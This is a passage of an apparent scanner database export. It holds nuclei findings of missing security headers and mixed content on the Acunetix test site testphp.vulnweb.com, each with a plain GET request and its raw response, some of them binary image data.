�RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 905, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:23.003Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 906, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:23.224Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 907, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:23.421Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 908, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:23.657Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 909, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/mixed-passive-content.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/mixed-passive-content", + "template_id": "mixed-passive-content", + "matcher_name": "img", + "name": "Mixed Passive Content", + "severity": 0, + "description": "This check detects if there are any passive content being loaded over HTTP instead of HTTPS.\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\"]", + "references": "['https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content', 'https://portswigger.net/kb/issues/01000400_mixed-content', 'https://resources.infosecinstitute.com/topics/vulnerabilities/https-mixed-content-vulnerability/', 'https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:42:23.853Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 910, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:24.023Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 911, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:24.234Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� 